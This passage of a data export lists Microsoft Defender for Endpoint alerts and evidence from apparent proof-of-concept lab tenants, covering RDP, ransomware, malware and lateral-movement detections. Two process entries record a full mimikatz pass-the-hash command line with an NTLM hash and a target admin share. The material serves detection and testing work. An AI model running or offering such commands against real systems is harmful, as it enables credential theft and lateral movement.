"version": "22H2",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": null,
"deviceId": null,
"domainName": "TMTOWER-BOOK",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T04:44:34.51Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T04:44:34.51Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "d0f9eadef51c0e325b16e79e03fadf997237a267",
"sha256": "4898d96e313d19b1df1976d5b7fff8e8bea17b184dab263e00a40054fbe0528f",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": "Detected",
"deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"domainName": "TMTOWER-BOOK",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T04:44:34.51Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 14616,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:WORKGROUP /run:\\\"powershell.exe dir \\\\tmtower-book-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-18T04:38:47.8575649Z",
"processId": 14652,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": "Detected",
"deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"domainName": "TMTOWER-BOOK",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T04:49:21.51Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 14616,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:WORKGROUP /run:\\\"powershell.exe dir \\\\tmtower-book-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-18T04:48:32.7080354Z",
"processId": 15148,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T21:20:35.1766667Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:13:01.0066667Z | Suspicious | None | jeff | rnd.local | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:15:47.8633333Z | Suspicious | None | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072957109047022_-1951943437 | 7a218a68-6d11-49a4-82d9-c0310ab253ed | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:48:30.9047201Z | 2022-12-22T08:48:31.6266667Z | null | 2022-12-22T08:26:21.72798Z | 2022-12-22T08:47:12.1411574Z | Suspicious RDP session | A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives. | SuspiciousActivity | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8 | null | null | null | [
"T1021.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "MSDXV8-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": "explorer.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:23.9030784Z",
"parentProcessFileName": "userinit.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 2796,
"processCommandLine": "Explorer.EXE",
"processCreationTime": "2022-12-22T08:26:24.0772409Z",
"processId": 1896,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d",
"sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": "userinit.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:19.8141047Z",
"parentProcessFileName": "winlogon.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 4656,
"processCommandLine": "userinit.exe",
"processCreationTime": "2022-12-22T08:26:23.9030784Z",
"processId": 2796,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "470c3e60f9b2b6d83f95c7916a5361e34dec3471",
"sha256": "1fe7f7c59ec7eaa276739fa85f7dda6136d81184e0aeb385b6ac9feaaa8c4394",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:07:49.8666667Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 11,068 | dir C:\ | 2022-11-21T02:01:28.4753286Z | 4,680 | 2022-11-10T07:07:26.0872385Z | explorer.exe | C:\Windows | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T13:26:37.6266667Z | Suspicious | None | darol | test.domain | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:03:41.86Z | Malicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638066012605013448_1322516070 | e5926eaf-cd8b-4e72-9e35-ab7adeaba690 | 794 | MicrosoftDefenderForEndpoint | 2022-12-14T07:54:20.5013644Z | 2022-12-14T08:00:01.6766667Z | null | 2022-12-14T07:42:43.7957873Z | 2022-12-14T07:42:43.7957873Z | 'Locky' ransomware was prevented | Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Ransomware | New | Medium | 60 | PendingApproval | null | null | WindowsDefenderAv | 51d03c45-b142-4de4-95df-01b0c259d8f6 | null | null | Locky | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Unknown",
"deviceDnsName": "tmtower-win10b.tmtower.m365dpoc.com",
"firstSeen": "2022-12-14T07:32:33.6902425Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "8d6414f0fc6bf2196d54aab4207d4a65873315c6",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "21H1",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "8d6414f0fc6bf2196d54aab4207d4a65873315c6",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-14T07:54:20.5366667Z",
"fileName": "TestFile_Block_Office_applications_from_creating_executable_content_3B576869-A4EC-4529-8536-B80A7769E899.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating executable content",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": "File was created again after being remediated by antivirus",
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:03:40.5733333Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638060594559668623_1450940669 | c1ca76d2-397e-428d-9edf-300936c126d4 | 794 | MicrosoftDefenderForEndpoint | 2022-12-08T01:24:15.9668895Z | 2022-12-08T01:37:06.9Z | null | 2022-12-08T01:12:10.8397945Z | 2022-12-08T01:12:10.8397945Z | 'Donoff' malware was prevented | Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Malware | New | Informational | 56 | PartiallyRemediated | null | null | WindowsDefenderAv | d60f5b90-ecd8-4d77-8186-a801597ec762 | null | null | Donoff | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotUpdated",
"deviceDnsName": "test.domain",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-08T01:24:16.0866667Z",
"fileName": "TestFile_OfficeChildProcess_D4F940AB-401B-4EFC-AADC-AD5F3C50688A.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating child processes",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "7bb22f50157cf267281a81918540f4aed4e0b0e1",
"sha256": "f5ec6a746f5d70212a8779e33722964c9ede5c23b3e171cd01e68b1a6c954e86",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2023-01-24T05:33:51.7933333Z | Unknown | None | User1 | DIYTESTMACHINE | S-1-5-21-4215714199-1288013905-3478400915-1002 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930750456970_1638136020 | ef830471-95c7-4a4d-8c45-860205d74e11 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:04:35.0457171Z | 2022-11-21T02:36:20.0366667Z | null | 2022-11-21T02:02:06.1870037Z | 2022-11-21T02:33:42.858223Z | Suspicious remote activity | Suspicious activity initiated remotely was observed on this machine. This alert can flag attempts to initiate interactive sessions, modify files, pass WMI commands, create scheduled tasks, and other potentially malicious activities from a remote machine. | LateralMovement | New | Medium | 49 | PendingApproval | null | null | WindowsDefenderAtp | 64e1767d-3cc3-4573-8707-d2892b79c155 | null | null | null | [
"T1021",
"T1105",
"T1543.003",
"T1569.002"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "corp.local",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "High",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-0-0",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:02:27.7361869Z",
"processId": 5760,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:15.6066667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:06:14.4989431Z",
"processId": 4572,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:16:04.3366667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:12:11.2117933Z",
"processId": 1984,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:34.1266667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:14:30.1674201Z",
"processId": 9008,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:19:04.8266667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:16:27.1164549Z",
"processId": 7888,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:11.75Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:22:22.878082Z",
"processId": 8064,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:28:04.95Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
